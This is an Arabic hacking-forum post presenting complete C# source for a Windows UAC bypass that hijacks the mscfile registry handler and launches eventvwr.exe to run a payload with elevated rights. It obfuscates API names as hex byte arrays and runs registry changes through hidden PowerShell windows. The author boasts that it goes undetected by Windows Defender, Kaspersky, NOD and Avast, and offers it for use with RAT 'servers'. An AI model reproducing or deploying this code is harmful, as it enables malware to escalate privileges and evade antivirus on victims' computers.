06.12.2017 Bypass Uac [W7,8] New Look [Clean-Bypass Avs]


  • الـلـهـم انـصـر اخـوانـنـا الـمـسـلـمـيـن فـي بـورمـا وكـن مـعـهـم يـاربـاه يـاربـاه

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
2,688
3,654
1
حياكم الله ياشباب
من سنتين او ثلاثة نزل الاخ دكتور بروك موضوعه هنا
تخطي صلاحيات الادمن UAC Bypass
ان بتنفذ محتوى السورس الان بشكله الحالي
سكان تايم رح يكون معاك 3 حمايات مهمة مكشوف منها
ClassLibrary8.exe | 3/36 | NoDistribute




اما ران تايم ف حدث ولاحرج فحتى الحمايات اللي ماكاشفة الكود سكان تايم
رح تجيبك ران تايم بسبب الاسلوب القديم المتبع بانشاء ساب كي جديد
وتسجيل مفتاح ريجيستري جديد وايضا عمل بروسس ستارت مباشرة
والكتابة على الهارد بالطريقة القديمة المتبعه
بشكل مباشر تعطيه File.WriteAllBytes
ولان ملفك الغير مووثوق هو الذي سيقوم بكل ذلك
فهذا امر مرفوض عند الحمايات
واثبتت هالشي قبل بفديوهات كثيرة مافاضي ارجع اثبت هالشي
لانه مثبت بعدة فديوهات ..
المهم الان اصبحت نتيجة فحص الكود
ClassLibrary7.exe | 0/36 | NoDistribute





وران تايم حدث ولاحرج مااحد رح يقدر يقول لك اي شيء
لنسخك ملف جديد على الهارد
ولااي حماية رح تحكيك شي لتسجيلك مفتاح جديد بالريجيستري
اعتمدت فيه على موضوعي هنا
الاستغناء عن الريسورس-امبيديد ريسورس-التحميل من النت-تضمين البايت اراي باي شكل بالسورس
وهنا
انسخ سيرفرك على الهارد وثبته بدون اي حركة من الحمايات [Nod-KasperSky-Avast-Windows Defender..Etc]

الموضوع ان ماتعرف رح يفيدك بمواضيع كثير منها ماتم ارفاقه هنا
من قبل الاخ بيبرس شومن
[ طريقة ] - new persistence startup method "mof file malware"
او بشكل عام ان كان معاك ناتج سورس يحتاج صلاحيات ادمن
ف انت بذلك حصلت عليها وكودك كلين وطريقة عمله لايتم التحسس منه
من قبل الحمايات ..تابع اخر 5 مواضيع عندي بتتاكد بنفسك ..
اللي ماعرف شو صار شي جديد بالموضوع
بقول لك ماكان كلين الكود سويته لك كلين من الكل
ماكان ران تايم بتقدر تتخطى فيه اي حماية
الان بتتخطى فيه الكل او عالاقل اللي جربت عليهم المرات الماضية وهم
ويندوز ديفيندر كاسبر نود افاست ..
السورس كان يعتمد بشكل كلي على مكتبة الريجيستري بالسي شارب
Microsoft.Win32.Registry
واستخدام CreateSubKey,SetValue
لوحدهم مصيبة وطامة كبرى للحمايات
الان بكل السورس مافيه اي شي له علاقة بالريجيستري
موجه الاومر بشغل لك الباور شيل وهو بيعمل لك كل شي
عوضا ان يقوم ملفك الغير موثوق للحمايات بذلك
بدوال وطرق مكشوفة وعف عليها الزمن
وفي الختام ماتم طرحه هنا لن تجده الا هنا :10:
فيكفيك هذا :28:

الكود من هنا "امزح لسا فيه كتير تحت" :15:




لمشاهدة الفديو من هنا
لاحظ كيف قمنا بالضحك على الحماية الاخيرة :15:

السورس هنا والفديو بالمرفقات

C#:
using System;
using System.IO;
using System.Text;
using System.Threading;
using System.Windows.Forms;
namespace ClassLibrary7
{
    public class Class1
    {
        static void Main()
        {
            string shel = "%SystemRoot%\\system32\\mmc.exe";
            var hrt = shel + " " + "\"%1\" %*";
            var t = Type.GetType(Bs(Fi()));
            t?.GetMethod(Bs(Windows()),
            new[] { typeof(string), typeof(byte[]) })?.Invoke(null,
                new object[] { Path.GetTempPath() + "Bashar.exe", Hh2((byte[])typeof(File).GetMethod(Bs(Microsoftt()), new[] { typeof(string) })?.Invoke(null, new object[] { Application.ExecutablePath })) });
            var startInfo = new System.Diagnostics.ProcessStartInfo
            {
                FileName = @"C:\Windows\system32\cmd.exe",
                Arguments = $"/k {"powershell REG ADD HKCU\\Software\\Classes\\mscfile\\shell\\open\\command /f  /t REG_SZ /d" + " " + Path.GetTempPath() + "Bashar.exe"}",
                WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden
            };
            var myProcess = GetMyProcess(startInfo);
            myProcess.Start();
            typeof(System.Diagnostics.Process)
                .GetMethod(Bs(Processs()), new[] { typeof(string) })?.Invoke(
                    null, new object[]
                        {Bs(Ent())});
            Thread.Sleep(10000);
            var startInfo2 = new System.Diagnostics.ProcessStartInfo
            {
                FileName = @"C:\Windows\system32\cmd.exe",
                Arguments = $"/k {"powershell REG ADD HKCU\\Software\\Classes\\mscfile\\shell\\open\\command /f  /t REG_SZ /d" + " " + hrt}",
                WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden
            };
            var myProcess2 = GetMyProcess(startInfo2);
 
            myProcess2.Start();
        }
        private static System.Diagnostics.Process GetMyProcess(System.Diagnostics.ProcessStartInfo startInfo)
        {
            return new System.Diagnostics.Process { StartInfo = startInfo };
        }
        static byte[] Hh2(byte[] bb)
        {
            var test2 = new byte[6656];
            Array.Copy(bb, 7680, test2, 0, test2.Length);
            return test2;
        }
        private static byte[] Microsoftt()
        {
            byte[] microsoft = {
                0x52, 0x65, 0x61, 0x64, 0x41, 0x6C, 0x6C, 0x42, 0x79, 0x74, 0x65, 0x73
            };
            return microsoft;
        }
        private static string Bs(byte[] b)
        {
            return Encoding.ASCII.GetString(b);
        }
 
        private static byte[] Processs()
        {
 
            byte[] process = {
                0x53, 0x74, 0x61, 0x72, 0x74
            };
            return process;
        }
        private static byte[] Windows()
        {
            byte[] windows = {
                0x57, 0x72, 0x69, 0x74, 0x65, 0x41, 0x6C, 0x6C, 0x42, 0x79, 0x74, 0x65,
                0x73
            };
            return windows;
        }
        private static byte[] Fi()
        {
            byte[] fi = {
                0x53, 0x79, 0x73, 0x74, 0x65, 0x6D, 0x2E, 0x49, 0x4F, 0x2E, 0x46, 0x69,
                0x6C, 0x65
            };
 
            return fi;
        }
        private static byte[] Ent()
        {
    
            byte[] ent = {
                0x65, 0x76, 0x65, 0x6E, 0x74, 0x76, 0x77, 0x72, 0x2E, 0x65, 0x78, 0x65
            };
 
 
            return ent;
        }
    }
}
الفديو بالمرفقات
 

المرفقات

  • أعجبني
التفاعلات: 3losh-rat

إخلاء مسؤلية

  • المنتدى غير مسؤول عن أي اتفاق تجاري أو تعاوني بين الأعضاء كل شخص يحمل مسئولية نفسه إتجاه مايقوم به protection-tips غير مسؤول عن أي اتفاق تجاري أو تعاوني بين الأعضاء كل شخص يحمل مسئولية نفسه إتجاه مايقوم به من بيع وشراء وإتفاق وأعطاء معلومات موقعه التعليقات المنشورة لا تعبر عن رأي معهد المنتدى ولا نتحمل أي مسؤولية قانونية حيال ذلك (ويتحمل كاتبها مسؤولية النشر).).

الإنتقال السريع

User Menu

تابعنا على الفيسبوك